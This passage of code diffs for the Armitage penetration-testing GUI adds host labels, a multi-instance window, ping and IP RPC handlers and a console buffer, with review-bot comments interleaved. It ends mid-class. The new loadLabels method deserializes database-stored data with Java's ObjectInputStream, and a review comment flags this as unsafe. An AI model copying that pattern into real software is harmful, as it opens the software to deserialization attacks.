local('$dialog $name $host $ports $os $button $session $label');
$dialog = dialog($title, 640, 480);
[$dialog setLayout: [new GridLayout: 6, 1]];
[$dialog setLayout: [new GridLayout: 7, 1]];
$name = [new ATextField: $1['name'], 16];
[$name setEnabled: $enable];
$host = [new ATextField: $1['hosts'], 16];
$ports = [new ATextField: $1['ports'], 16];
$os = [new ATextField: $1['os'], 16];
$label = [new ATextField: $1['labels'], 16];
$session = [new JCheckBox: "Hosts with sessions only"];
if ($1['session'] eq 1) {
[$session setSelected: 1];
@ -108,6 +109,7 @@ sub workspaceDialog {
[$dialog add: label_for("Hosts:", 60, $host)];
[$dialog add: label_for("Ports:", 60, $ports)];
[$dialog add: label_for("OS:", 60, $os)];
[$dialog add: label_for("Labels:", 60, $label)];
[$dialog add: $session];
[$dialog add: center($button)];
@ -116,15 +118,16 @@ sub workspaceDialog {
[$button addActionListener: lambda({
# yay, we have a dialog...
local('$n $h $p $o $s @workspaces $ws $temp');
local('$n $h $p $o $s $l @workspaces $ws $temp');
$n = [[$name getText] trim];
$h = [strrep([$host getText], '*', '%', '?', '_') trim];
$p = [[$ports getText] trim];
$o = [strrep([$os getText], '*', '%', '?', '_') trim];
$l = [[$label getText] trim];
$s = [$session isSelected];
# save the new menu
$ws = workspace($n, $h, $p, $o, $s);
$ws = workspace($n, $h, $p, $o, $s, $l);
@workspaces = workspaces();
foreach $temp (@workspaces) {
if ($temp["name"] eq $n) {
@ -140,7 +143,7 @@ sub workspaceDialog {
updateWorkspaceList($table, $model);
[$dialog setVisible: 0];
}, \$dialog, \$host, \$ports, \$os, \$name, \$session, \$table, \$model)];
}, \$dialog, \$host, \$ports, \$os, \$name, \$session, \$table, \$model, \$label)];
}
sub reset_workspace {
@ -199,16 +202,16 @@ sub set_workspace {
}
sub workspace {
return ohash(name => $1, hosts => $2, ports => $3, os => $4, session => $5);
return ohash(name => $1, hosts => $2, ports => $3, os => $4, session => $5, labels => $6);
}
sub workspaces {
local('$ws @r $name $host $port $os $session $workspace');
local('$ws @r $name $host $port $os $session $workspace $label');
$ws = split("!!", [$preferences getProperty: "armitage.workspaces.menus", ""]);
foreach $workspace ($ws) {
if ($workspace ne "") {
($name, $host, $port, $os, $session) = split('@@', $workspace);
push(@r, workspace($name, $host, $port, $os, $session));
($name, $host, $port, $os, $session, $label) = split('@@', $workspace);
push(@r, workspace($name, $host, $port, $os, $session, $label));
}
}
return @r;
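Review bot: saved workspaces are serialised with '@@' between fields and '!!' between entries, so a label filter containing either sequence corrupts the stored list, and the new free-text `labels` field makes that more likely. Reject or escape those sequences in workspaceDialog, or store the list as a proper structure. Entries saved before this change have no sixth field and yield a null `$label`, which is fine as long as callers treat null as "no filter".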

View File

@ -13,13 +13,32 @@ import cortana.gui.MenuBuilder;
import ui.*;
public class ArmitageApplication extends JFrame {
public class ArmitageApplication extends JComponent {
protected JTabbedPane tabs = null;
protected JSplitPane split = null;
protected JMenuBar menus = new JMenuBar();
protected ScreenshotManager screens = null;
protected KeyBindings keys = new KeyBindings();
protected MenuBuilder builder = null;
protected String title = "";
protected MultiFrame window = null;
public KeyBindings getBindings() {
return keys;
}
public void setTitle(String title) {
this.title = title;
window.setTitle(this, title);
}
public String getTitle() {
return title;
}
public void setIconImage(Image blah) {
window.setIconImage(blah);
}
public void setScreenshotManager(ScreenshotManager m) {
screens = m;
@ -192,10 +211,11 @@ public class ArmitageApplication extends JFrame {
/* pop goes the tab! */
final JFrame r = new JFrame(t.title);
r.setIconImages(getIconImages());
//r.setIconImages(getIconImages());
r.setLayout(new BorderLayout());
r.add(t.component, BorderLayout.CENTER);
r.pack();
t.component.validate();
r.addWindowListener(new WindowAdapter() {
public void windowClosing(WindowEvent ev) {
@ -365,8 +385,20 @@ public class ArmitageApplication extends JFrame {
component.requestFocusInWindow();
}
public ArmitageApplication() {
public void touch() {
Component c = tabs.getSelectedComponent();
if (c == null)
return;
if (c instanceof Activity)
((Activity)c).resetNotification();
c.requestFocusInWindow();
}
public ArmitageApplication(MultiFrame f, String details, msf.RpcConnection conn) {
super();
window = f;
tabs = new DraggableTabbedPane();
setLayout(new BorderLayout());
@ -382,10 +414,8 @@ public class ArmitageApplication extends JFrame {
/* add our tabbed pane */
add(split, BorderLayout.CENTER);
/* setup our key bindings */
KeyboardFocusManager.getCurrentKeyboardFocusManager().addKeyEventDispatcher(keys);
/* ... */
setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
//setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
((ui.MultiFrame)window).addButton(details, this, conn);
}
}
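Review bot: `setDefaultCloseOperation` is left as a commented-out line rather than removed; dead code like this tends to linger. The cast `((ui.MultiFrame)window)` is unnecessary since the `window` field is already declared as MultiFrame.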

View File

@ -0,0 +1,138 @@
package armitage;
import java.util.*;
/*
* Implement a thread safe store that any client may write to and
* any client may read from (keeping track of their cursor into
* the console)
*/
public class ArmitageBuffer {
private static final class Message {
public String message = null;
public Message next = null;
}
/* store our messages... */
public Message first = null;
public Message last = null;
public long size = 0;
public long max = 0;
public String prompt = "";
/* store indices into this buffer */
public Map indices = new HashMap();
/* setup the buffer?!? :) */
public ArmitageBuffer(long max) {
this.max = max;
}
/* store a prompt with this buffer... we're not going to do any indexing magic for now */
public String getPrompt() {
synchronized (this) {
return prompt;
}
}
/* set the prompt */
public void setPrompt(String text) {
synchronized (this) {
prompt = text;
}
}
/* post a message to this buffer */
public void put(String text) {
synchronized (this) {
/* create our message */
Message m = new Message();
m.message = text;
/* store our message */
if (last == null && first == null) {
first = m;
last = m;
}
else {
last.next = m;
last = m;
}
/* increment number of stored messages */
size += 1;
/* limit the total number of past messages to the max size */
if (size > max) {
first = first.next;
}
}
}
/* retrieve a set of all clients consuming this buffer */
public Collection clients() {
synchronized (this) {
LinkedList clients = new LinkedList(indices.keySet());
return clients;
}
}
/* free a client */
public void free(String id) {
synchronized (this) {
indices.remove(id);
}
}
/* reset our indices too */
public void reset() {
synchronized (this) {
first = null;
last = null;
indices.clear();
size = 0;
}
}
/* retrieve all messages available to the client (if any) */
public String get(String id) {
synchronized (this) {
/* nadaz */
if (first == null)
return "";
/* get our index into the buffer */
Message index = null;
if (!indices.containsKey(id)) {
index = first;
}
else {
index = (Message)indices.get(id);
/* nothing happening */
if (index.next == null)
return "";
index = index.next;
}
/* now let's walk through it */
StringBuffer result = new StringBuffer();
Message temp = index;
while (temp != null) {
result.append(temp.message);
index = temp;
temp = temp.next;
}
/* store our index */
indices.put(id, index);
return result.toString();
}
}
public String toString() {
return "[" + size + " messages]";
}
}
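Review bot: put() never decrements `size` when it drops the oldest message, so after the first eviction every put evicts one message; that keeps the live list at `max` entries, but `size` and toString then report the total ever stored rather than the current count. More importantly, a client's saved index is a reference into the linked list, so a client that stops polling pins every node from its cursor onward, evicted ones included, and memory grows without bound until free(id) is called on disconnect. A counter-based cursor over a bounded deque, or dropping stale indices when their node is evicted, would keep the `max` bound meaningful. The fields first, last, size and indices can also be private.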

View File

@ -9,10 +9,10 @@ import sleep.engine.*;
import sleep.parser.ParserConfig;
import java.util.*;
import java.io.*;
import cortana.core.*;
import ui.*;
/**
* This class launches Armitage and loads the scripts that are part of it.
@ -101,7 +101,7 @@ public class ArmitageMain implements RuntimeWarningWatcher, Loadable, Function {
};
}
public ArmitageMain(String[] args) {
public ArmitageMain(String[] args, MultiFrame window, boolean serverMode) {
/* tweak the parser to recognize a few useful escapes */
ParserConfig.installEscapeConstant('c', console.Colors.color + "");
ParserConfig.installEscapeConstant('U', console.Colors.underline + "");
@ -118,15 +118,6 @@ public class ArmitageMain implements RuntimeWarningWatcher, Loadable, Function {
ScriptLoader loader = new ScriptLoader();
loader.addSpecificBridge(this);
/* check for server mode option */
boolean serverMode = false;
int x = 0;
for (x = 0; x < args.length; x++) {
if (args[x].equals("--server"))
serverMode = true;
}
/* setup Cortana event and filter bridges... we will install these into
Armitage */
if (!serverMode) {
@ -135,6 +126,7 @@ public class ArmitageMain implements RuntimeWarningWatcher, Loadable, Function {
variables.putScalar("$__events__", SleepUtils.getScalar(events));
variables.putScalar("$__filters__", SleepUtils.getScalar(filters));
variables.putScalar("$__frame__", SleepUtils.getScalar(window));
loader.addGlobalBridge(events.getBridge());
loader.addGlobalBridge(filters.getBridge());
@ -142,7 +134,7 @@ public class ArmitageMain implements RuntimeWarningWatcher, Loadable, Function {
/* load the appropriate scripts */
String[] scripts = serverMode ? getServerScripts() : getGUIScripts();
int x = -1;
try {
for (x = 0; x < scripts.length; x++) {
InputStream i = this.getClass().getClassLoader().getResourceAsStream(scripts[x]);
@ -161,6 +153,23 @@ public class ArmitageMain implements RuntimeWarningWatcher, Loadable, Function {
}
public static void main(String args[]) {
new ArmitageMain(args);
/* check for server mode option */
boolean serverMode = false;
int x = 0;
for (x = 0; x < args.length; x++) {
if (args[x].equals("--server"))
serverMode = true;
}
/* setup our armitage instance */
if (serverMode) {
new ArmitageMain(args, null, serverMode);
}
else {
MultiFrame.setupLookAndFeel();
MultiFrame frame = new MultiFrame();
new ArmitageMain(args, frame, serverMode);
}
}
}

View File

@ -0,0 +1,60 @@
package armitage;
import console.Console;
import msf.*;
import java.util.*;
import java.awt.*;
import java.awt.event.*;
import javax.swing.*;
import java.io.IOException;
public class EventLogTabCompletion extends GenericTabCompletion {
protected RpcConnection connection;
public EventLogTabCompletion(Console window, RpcConnection connection) {
super(window);
this.connection = connection;
}
public Collection getOptions(String text) {
try {
Map response = (Map)connection.execute("armitage.lusers", new Object[] {});
if (response.get("lusers") == null)
return null;
Iterator users = ((Collection)response.get("lusers")).iterator();
LinkedList options = new LinkedList();
String word;
String pre;
if (text.endsWith(" ")) {
word = "";
pre = text;
}
if (text.lastIndexOf(" ") != -1) {
word = text.substring(text.lastIndexOf(" ") + 1);
pre = text.substring(0, text.lastIndexOf(" ") + 1);
}
else {
word = text;
pre = "";
}
while (users.hasNext()) {
String user = users.next() + "";
if (user.startsWith(word)) {
options.add(pre + user);
}
}
return options;
}
catch (IOException ioex) {
ioex.printStackTrace();
}
return null;
}
}
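Review bot: the `if (text.endsWith(" "))` block is followed by a plain `if (text.lastIndexOf(" ") != -1)` rather than `else if`, so when the text ends with a space both branches run and the second overwrites word and pre; the values happen to be identical, but make it `else if` to state the intent. Only IOException is caught, so a malformed response (for example `lusers` not being a Collection) throws out of tab completion.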

View File

@ -15,7 +15,7 @@ public class Loader implements Loadable {
protected ScriptLoader loader;
protected Hashtable shared = new Hashtable();
protected ScriptVariables vars = new ScriptVariables();
protected Object[] passMe = new Object[2];
protected Object[] passMe = new Object[3];
protected List scripts = new LinkedList();
public void unsetDebugLevel(int flag) {
@ -51,10 +51,11 @@ public class Loader implements Loadable {
}
}
public void passObjects(Object o, Object p) {
public void passObjects(Object o, Object p, Object q) {
synchronized (this) {
passMe[0] = o;
passMe[1] = p;
passMe[2] = q;
}
}

View File

@ -69,7 +69,7 @@ public class Main implements Runnable, CortanaPipe.CortanaPipeListener {
try {
Object conns[] = setupConnections(host, port, user, pass, nick);
//new MsgRpcImpl(user, pass, host, Integer.parseInt(port), true, false);
engine = new Cortana((RpcConnection)conns[0], (RpcConnection)conns[1], scripts, host);
engine = new Cortana((RpcConnection)conns[0], (RpcConnection)conns[1], scripts, (String)conns[2]);
new Thread(this).start();
}
catch (java.lang.RuntimeException rex) {

View File

@ -453,17 +453,26 @@ public class NetworkGraph extends JComponent implements ActionListener {
protected Map tooltips = new HashMap();
public Object addNode(String id, String label, Image image, String tooltip) {
public Object addNode(String id, String label, String description, Image image, String tooltip) {
nodeImages.put(id, image);
if (label.length() > 0) {
if (description.length() > 0) {
description += "\n" + label;
}
else {
description = label;
}
}
mxCell cell;
if (!nodes.containsKey(id)) {
cell = (mxCell)graph.insertVertex(parent, id, label, 0, 0, 125, 97);
cell = (mxCell)graph.insertVertex(parent, id, description, 0, 0, 125, 97);
nodes.put(id, cell);
}
else {
cell = (mxCell)nodes.get(id);
cell.setValue(label);
cell.setValue(description);
}
nodes.touch(id);

View File

@ -14,11 +14,15 @@ public class DatabaseImpl implements RpcConnection {
protected String workspaceid = "0";
protected String hFilter = null;
protected String sFilter = null;
protected String[] lFilter = null;
protected Route[] rFilter = null;
protected String[] oFilter = null;
protected int hindex = 0;
protected int sindex = 0;
/* keep track of labels associated with each host */
protected Map labels = new HashMap();
/* define the maximum hosts in a workspace */
protected int maxhosts = 512;
@ -135,6 +139,20 @@ public class DatabaseImpl implements RpcConnection {
return false;
}
private boolean checkLabel(String host) {
if (!labels.containsKey(host))
return false;
String label_l = (labels.get(host) + "").toLowerCase();
for (int x = 0; x < lFilter.length; x++) {
if (label_l.indexOf(lFilter[x]) != -1) {
return true;
}
}
return false;
}
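Review bot: checkLabel lowercases the host's label but compares it against `lFilter[x]` as stored; unless lFilter is lowercased where it is assigned, a mixed-case filter never matches. indexOf also makes this a substring match, so a filter of "db" matches a label "adb"; document that or match whole words.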
private boolean checkOS(String os) {
String os_l = os.toLowerCase();
@ -145,11 +163,76 @@ public class DatabaseImpl implements RpcConnection {
return false;
}
protected void loadLabels() {
try {
/* query database for label data */
List rows = executeQuery("SELECT DISTINCT data FROM notes WHERE ntype = 'armitage.labels'");
if (rows.size() == 0)
return;
/* extract our BASE64 encoded data */
String data = ((Map)rows.get(0)).get("data") + "";
System.err.println("Read: " + data.length() + " bytes");
/* turn our data into raw data */
byte[] raw = Base64.decode(data);
/* deserialize our notes data */
ByteArrayInputStream store = new ByteArrayInputStream(raw);
ObjectInputStream handle = new ObjectInputStream(store);
Map temp = (Map)(handle.readObject());
handle.close();
store.close();
/* merge with our new map */
labels.putAll(temp);
}
catch (Exception ex) {
ex.printStackTrace();
}
}
protected void mergeLabels(Map l) {
/* accept any label values and merge them into our global data set */
Iterator i = l.entrySet().iterator();
while (i.hasNext()) {
Map.Entry entry = (Map.Entry)i.next();
if ("".equals(entry.getValue())) {
labels.remove(entry.getKey() + "");
}
else {
labels.put(entry.getKey() + "", entry.getValue() + "");
}
}
}
/* add labels to our hosts */
public List addLabels(List rows) {
if (labels.size() == 0)
return rows;
Iterator i = rows.iterator();
while (i.hasNext()) {
Map entry = (Map)i.next();
String address = (entry.containsKey("address") ? entry.get("address") : entry.get("host")) + "";
if (labels.containsKey(address)) {
entry.put("label", labels.get(address) + "");
}
else {
entry.put("label", "");
}
}
return rows;
}
public List filterByRoute(List rows, int max) {
if (rFilter != null || oFilter != null) {
if (rFilter != null || oFilter != null || lFilter != null) {
Iterator i = rows.iterator();
while (i.hasNext()) {
Map entry = (Map)i.next();
/* make sure the address is within a route we care about */
if (rFilter != null && entry.containsKey("address")) {
if (!checkRoute(entry.get("address") + "")) {
i.remove();
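Review bot: `loadLabels` feeds whatever is stored in `notes.data` for ntype `armitage.labels` straight into `ObjectInputStream.readObject`, so anything that can insert a notes row with that ntype decides what every Armitage instance deserializes on `connect`; the payload is only a map of address-to-label strings, so a plain text encoding (one `address=label` line per entry, or a JSON object) carries the same information without native deserialization and removes the unchecked `(Map)` cast. Two smaller points: `rows.get(0)` silently ignores any further `DISTINCT` rows, and `System.err.println("Read: " + data.length() + " bytes")` reads like leftover debugging output.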
@ -163,9 +246,26 @@ public class DatabaseImpl implements RpcConnection {
}
}
/* make sure the host is something we care about too */
if (oFilter != null && entry.containsKey("os_name")) {
if (!checkOS(entry.get("os_name") + ""))
if (!checkOS(entry.get("os_name") + "")) {
i.remove();
continue;
}
}
/* make sure the host has the right label */
if (lFilter != null && entry.containsKey("address")) {
if (!checkLabel(entry.get("address") + "")) {
i.remove();
continue;
}
}
else if (lFilter != null && entry.containsKey("host")) {
if (!checkLabel(entry.get("host") + "")) {
i.remove();
continue;
}
}
}
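Review bot: the two label branches in `filterByRoute` differ only in which key is read, so `String key = entry.containsKey("address") ? "address" : "host";` followed by a single `checkLabel` call would remove the duplicated `i.remove(); continue;` block. A row that carries neither `address` nor `host` passes the label filter untouched, which matches how the route and OS checks treat a missing key, but a comment saying so would help.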
@ -180,6 +280,7 @@ public class DatabaseImpl implements RpcConnection {
public void connect(String dbstring, String user, String password) throws Exception {
db = DriverManager.getConnection(dbstring, user, password);
setWorkspace("default");
loadLabels();
}
public Object execute(String methodName) throws IOException {
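Review bot: `loadLabels` runs once from `connect`, and its query `SELECT DISTINCT data FROM notes WHERE ntype = 'armitage.labels'` is not restricted to the workspace chosen by `setWorkspace("default")`, so labels are global across workspaces and are not reloaded when the workspace later changes; if per-workspace labels are wanted the note row needs a workspace constraint and `setWorkspace` should reload. `loadLabels` also catches `Exception` and only prints the stack trace, so a corrupt label blob leaves the connection up with an empty label map and no visible error.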
@ -192,8 +293,8 @@ public class DatabaseImpl implements RpcConnection {
/* this is an optimization. If we have a network or OS filter, we need to pull back all host/service records and
filter them here. If we do not have these types of filters, then we can let the database do the heavy lifting
and limit the size of the final result there. */
int limit1 = rFilter == null && oFilter == null ? maxhosts : 30000;
int limit2 = rFilter == null && oFilter == null ? maxservices : 100000;
int limit1 = rFilter == null && oFilter == null && lFilter == null ? maxhosts : 30000;
int limit2 = rFilter == null && oFilter == null && lFilter == null ? maxservices : 100000;
temp.put("db.creds", "SELECT DISTINCT creds.*, hosts.address as host, services.name as sname, services.port as port, services.proto as proto FROM creds, services, hosts WHERE services.id = creds.service_id AND hosts.id = services.host_id AND hosts.workspace_id = " + workspaceid);
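Review bot: the comment above `limit1`/`limit2` still says "If we have a network or OS filter", but the condition now also tests `lFilter`; update it to mention the label filter so the next reader knows why a label filter forces the 30000/100000 limits.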
@ -209,13 +310,13 @@ public class DatabaseImpl implements RpcConnection {
if (hFilter.indexOf("sessions.") >= 0)
tables.add("sessions");
temp.put("db.hosts", "SELECT DISTINCT hosts.* FROM " + join(tables, ", ") + " WHERE hosts.workspace_id = " + workspaceid + " AND " + hFilter + " ORDER BY hosts.id ASC LIMIT " + limit1 + " OFFSET " + (limit1 * hindex));
temp.put("db.hosts", "SELECT DISTINCT hosts.id, hosts.updated_at, hosts.state, hosts.mac, hosts.purpose, hosts.os_flavor, hosts.os_name, hosts.address, hosts.os_sp FROM " + join(tables, ", ") + " WHERE hosts.workspace_id = " + workspaceid + " AND " + hFilter + " ORDER BY hosts.id ASC LIMIT " + limit1 + " OFFSET " + (limit1 * hindex));
}
else {
temp.put("db.hosts", "SELECT DISTINCT hosts.* FROM hosts WHERE hosts.workspace_id = " + workspaceid + " ORDER BY hosts.id ASC LIMIT " + limit1 + " OFFSET " + (hindex * limit1));
temp.put("db.hosts", "SELECT DISTINCT hosts.id, hosts.updated_at, hosts.state, hosts.mac, hosts.purpose, hosts.os_flavor, hosts.os_name, hosts.address, hosts.os_sp FROM hosts WHERE hosts.workspace_id = " + workspaceid + " ORDER BY hosts.id ASC LIMIT " + limit1 + " OFFSET " + (hindex * limit1));
}
temp.put("db.services", "SELECT DISTINCT services.*, hosts.address as host FROM services, (" + temp.get("db.hosts") + ") as hosts WHERE hosts.id = services.host_id AND services.state = 'open' ORDER BY services.id ASC LIMIT " + limit2 + " OFFSET " + (limit2 * sindex));
temp.put("db.services", "SELECT DISTINCT services.id, services.name, services.port, services.proto, services.info, services.updated_at, hosts.address as host FROM services, (" + temp.get("db.hosts") + ") as hosts WHERE hosts.id = services.host_id AND services.state = 'open' ORDER BY services.id ASC LIMIT " + limit2 + " OFFSET " + (limit2 * sindex));
temp.put("db.loots", "SELECT DISTINCT loots.*, hosts.address as host FROM loots, hosts WHERE hosts.id = loots.host_id AND hosts.workspace_id = " + workspaceid);
temp.put("db.workspaces", "SELECT DISTINCT * FROM workspaces");
temp.put("db.notes", "SELECT DISTINCT notes.*, hosts.address as host FROM notes, hosts WHERE hosts.id = notes.host_id AND hosts.workspace_id = " + workspaceid);
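Review bot: replacing `hosts.*` and `services.*` with explicit column lists changes the shape of the `db.hosts` and `db.services` results for every caller; list the dropped fields in the commit message or changelog (the changelog entry only says "unused fields") so scripts consuming these RPC results can be checked, and pull the column list into a constant since it is repeated verbatim in both `db.hosts` branches.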
@ -235,7 +336,7 @@ public class DatabaseImpl implements RpcConnection {
result.put(methodName.substring(3), filterByRoute(executeQuery(query), maxservices));
}
else if (methodName.equals("db.hosts")) {
result.put(methodName.substring(3), filterByRoute(executeQuery(query), maxhosts));
result.put(methodName.substring(3), addLabels(filterByRoute(executeQuery(query), maxhosts)));
}
else {
result.put(methodName.substring(3), executeQuery(query));
@ -311,6 +412,10 @@ public class DatabaseImpl implements RpcConnection {
return new HashMap();
}
else if (methodName.equals("db.clear")) {
/* clear our local cache of labels */
labels = new HashMap();
/* clear the database */
executeUpdate(
"BEGIN;" +
"DELETE FROM hosts;" +
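Review bot: `db.clear` resets the in-memory `labels` map, but the persisted copy lives in `notes` under ntype `armitage.labels`; unless the transaction below also deletes from `notes`, `loadLabels` will restore the old labels on the next `connect`, so please confirm that table is covered or add an explicit `DELETE FROM notes WHERE ntype = 'armitage.labels'` to this statement.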
@ -332,6 +437,7 @@ public class DatabaseImpl implements RpcConnection {
rFilter = null;
oFilter = null;
lFilter = null;
List hosts = new LinkedList();
List srvcs = new LinkedList();
@ -385,6 +491,11 @@ public class DatabaseImpl implements RpcConnection {
oFilter = (values.get("os") + "").toLowerCase().split(",\\s*");
}
/* label filter */
if (values.containsKey("labels") && (values.get("labels") + "").length() > 0) {
lFilter = (values.get("labels") + "").toLowerCase().split(",\\s*");
}
if (hosts.size() == 0) {
hFilter = null;
}
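Review bot: `split(",\\s*")` on input such as `web,,db` or `,web` leaves an empty string in `lFilter`, and `label_l.indexOf("")` returns 0, so a single empty entry makes `checkLabel` accept every labelled host; drop empty entries after the split (the `oFilter` line above has the same issue).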
@ -406,6 +517,31 @@ public class DatabaseImpl implements RpcConnection {
result.put("rows", new Integer(stmt.executeUpdate()));
return result;
}
else if (methodName.equals("db.report_labels")) {
/* merge out global label data */
Map values = (Map)params[0];
mergeLabels(values);
/* delete our saved label data */
executeUpdate("DELETE FROM notes WHERE notes.ntype = 'armitage.labels'");
/* serialize our notes data */
ByteArrayOutputStream store = new ByteArrayOutputStream(labels.size() * 128);
ObjectOutputStream handle = new ObjectOutputStream(store);
handle.writeObject(labels);
handle.close();
store.close();
String data = Base64.encode(store.toByteArray());
/* save our label data */
PreparedStatement stmt = null;
stmt = db.prepareStatement("INSERT INTO notes (ntype, data) VALUES ('armitage.labels', ?)");
stmt.setString(1, data);
stmt.executeUpdate();
return new HashMap();
}
else if (methodName.equals("db.report_host")) {
Map values = (Map)params[0];
String host = values.get("host") + "";
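Review bot: in the `db.report_labels` branch the `PreparedStatement` is never closed, and the `DELETE` and `INSERT` run as two separate statements, so two team members calling `db.report_labels` at the same time can interleave and leave zero or two `armitage.labels` rows (only the first of which `loadLabels` reads); wrap both in one transaction (the `db.clear` branch already starts its statement with `BEGIN;`) and close the statement in a `finally`. This is also the write side of the Java serialization format used by `loadLabels`; a text encoding here would let the read side drop `ObjectInputStream` entirely.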

View File

@ -32,7 +32,7 @@ public class RpcAsync implements RpcConnection, Async {
if (methodName.equals("module.info") || methodName.equals("module.options") || methodName.equals("module.compatible_payloads")) {
StringBuilder keysb = new StringBuilder(methodName);
for(int i = 1; i < params.length; i++)
for(int i = 0; i < params.length; i++)
keysb.append(params[i].toString());
String key = keysb.toString();
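Review bot: starting the loop at 0 fixes the cache key omitting `params[0]`, but the parameters are still concatenated without a separator, so `("ab", "c")` and `("a", "bc")` produce the same key; append a delimiter that cannot occur in a module name between entries, and guard against a null entry, since `params[i].toString()` would throw.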

View File

@ -106,6 +106,8 @@ public class RpcCacheImpl implements Runnable {
key.append(temp.get("ports"));
key.append(";");
key.append(temp.get("session"));
key.append(";");
key.append(temp.get("labels"));
return key.toString();
}

View File

@ -84,12 +84,40 @@ public abstract class RpcConnectionImpl implements RpcConnection, Async {
}
protected HashMap locks = new HashMap();
protected String address = "";
public String getLocalAddress() {
return address;
}
/** Adds token, runs command, and notifies logger on call and return */
public Object execute(String methodName, Object[] params) throws IOException {
if (database != null && "db.".equals(methodName.substring(0, 3))) {
return database.execute(methodName, params);
}
else if (methodName.equals("armitage.ping")) {
try {
long time = System.currentTimeMillis() - Long.parseLong(params[0] + "");
HashMap res = new HashMap();
res.put("result", time + "");
return res;
}
catch (Exception ex) {
HashMap res = new HashMap();
res.put("result", "0");
return res;
}
}
else if (methodName.equals("armitage.my_ip")) {
HashMap res = new HashMap();
res.put("result", address);
return res;
}
else if (methodName.equals("armitage.set_ip")) {
address = params[0] + "";
return new HashMap();
}
else if (methodName.equals("armitage.lock")) {
if (locks.containsKey(params[0] + "")) {
Map res = new HashMap();
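Review bot: `armitage.set_ip` stores whatever string the caller sends as `address` without validation, and `armitage.my_ip` hands it back to every client; if the value is only used for display that is fine, but if anything builds connection strings or payload options from `getLocalAddress()`, validate it as an IP address or hostname first. Minor: `"db.".equals(methodName.substring(0, 3))` throws `StringIndexOutOfBoundsException` for method names shorter than three characters; `methodName.startsWith("db.")` avoids that.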

View File

@ -66,7 +66,7 @@ public class RpcQueue implements Runnable {
Thread.sleep(50);
}
else {
Thread.sleep(500);
Thread.sleep(200);
}
}
}

View File

@ -1,11 +1,11 @@
package table;
import javax.swing.*;
import javax.swing.event.*;
import javax.swing.*;
import javax.swing.event.*;
import javax.swing.border.*;
import javax.swing.table.*;
import java.awt.*;
import java.awt.*;
import java.awt.event.*;
import java.awt.image.*;
@ -52,7 +52,7 @@ public class NetworkTable extends JComponent implements ActionListener {
public NetworkTable(Properties display) {
this.display = display;
model = new GenericTableModel(new String[] { " ", "Address", "Description", "Pivot" }, "Address", 256);
model = new GenericTableModel(new String[] { " ", "Address", "Label", "Description", "Pivot" }, "Address", 256);
table = new ATable(model);
TableRowSorter sorter = new TableRowSorter(model);
sorter.toggleSortOrder(1);
@ -79,23 +79,24 @@ public class NetworkTable extends JComponent implements ActionListener {
};
sorter.setComparator(1, hostCompare);
sorter.setComparator(3, hostCompare);
sorter.setComparator(4, hostCompare);
table.setRowSorter(sorter);
table.setColumnSelectionAllowed(false);
table.getColumn("Address").setPreferredWidth(125);
table.getColumn("Label").setPreferredWidth(125);
table.getColumn("Pivot").setPreferredWidth(125);
table.getColumn(" ").setPreferredWidth(32);
table.getColumn(" ").setMaxWidth(32);
table.getColumn("Description").setPreferredWidth(500);
final TableCellRenderer parent = table.getDefaultRenderer(Object.class);
table.setDefaultRenderer(Object.class, new TableCellRenderer() {
final TableCellRenderer phear = new TableCellRenderer() {
public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int col) {
JLabel component = (JLabel)parent.getTableCellRendererComponent(table, value, isSelected, false, row, col);
if (col == 3 && Boolean.TRUE.equals(model.getValueAt(table, row, "Active"))) {
if (col == 4 && Boolean.TRUE.equals(model.getValueAt(table, row, "Active"))) {
component.setFont(component.getFont().deriveFont(Font.BOLD));
}
else if (col == 1 && !"".equals(model.getValueAt(table, row, "Description"))) {
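Review bot: inserting the `Label` column shifted every hard-coded index (`col == 3` became `col == 4`, and the comparator moved to column 4), while the `col == 1` branch still assumes `Address` is column 1; resolving the index via `table.getColumn("Pivot").getModelIndex()` or comparing column names would keep the renderer correct the next time a column is added.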
@ -110,9 +111,15 @@ public class NetworkTable extends JComponent implements ActionListener {
if (tip.length() > 0) {
component.setToolTipText(tip);
}
return component;
}
});
};
table.getColumn("Address").setCellRenderer(phear);
table.getColumn("Label").setCellRenderer(phear);
table.getColumn("Description").setCellRenderer(phear);
table.getColumn("Pivot").setCellRenderer(phear);
table.getColumn(" ").setCellRenderer(new TableCellRenderer() {
public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int col) {
@ -252,16 +259,17 @@ public class NetworkTable extends JComponent implements ActionListener {
public void addActionForKeySetting(String key, String dvalue, Action action) {
}
public Object addNode(String id, String label, Image image, String tooltip) {
public Object addNode(String id, String label, String description, Image image, String tooltip) {
if (id == null || label == null)
return null;
HashMap map = new HashMap();
map.put("Address", id);
if (label.indexOf(id) > -1)
label = label.substring(id.length());
map.put("Description", label);
if (description.indexOf(id) > -1)
description = description.substring(id.length());
map.put("Label", label);
map.put("Description", description);
map.put("Tooltip", tooltip);
map.put("Image", image);
map.put(" ", tooltip);
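Review bot: `addNode` null-checks `id` and `label` but not the new `description` parameter, and `description.indexOf(id)` throws `NullPointerException` if a caller passes null; either add `description == null` to the guard or treat null as an empty string.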

View File

@ -26,6 +26,12 @@ public class ATable extends JTable {
specialitems.add("WORDLIST");
specialitems.add("SESSION");
specialitems.add("REXE");
specialitems.add("EXE::Custom");
specialitems.add("EXE::Template");
specialitems.add("USERNAME");
specialitems.add("PASSWORD");
specialitems.add("SMBUser");
specialitems.add("SMBPass");
return new TableCellRenderer() {
public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int column) {

View File

@ -0,0 +1,238 @@
package ui;
import javax.swing.*;
import javax.swing.event.*;
import java.awt.*;
import java.awt.event.*;
import java.util.*;
import armitage.ArmitageApplication;
import msf.*;
/* A class to host multiple Armitage instances in one frame. Srsly */
public class MultiFrame extends JFrame implements KeyEventDispatcher {
protected JToolBar toolbar;
protected JPanel content;
protected CardLayout cards;
protected LinkedList buttons;
private static class ArmitageInstance {
public ArmitageApplication app;
public JToggleButton button;
public RpcConnection client;
}
public Map getClients() {
synchronized (buttons) {
Map r = new HashMap();
Iterator i = buttons.iterator();
while (i.hasNext()) {
ArmitageInstance temp = (ArmitageInstance)i.next();
r.put(temp.button.getText(), temp.client);
}
return r;
}
}
public void setTitle(ArmitageApplication app, String title) {
if (active == app)
setTitle(title);
}
protected ArmitageApplication active;
/* is localhost running? */
public boolean checkLocal() {
synchronized (buttons) {
Iterator i = buttons.iterator();
while (i.hasNext()) {
ArmitageInstance temp = (ArmitageInstance)i.next();
if ("localhost".equals(temp.button.getText())) {
return true;
}
}
return false;
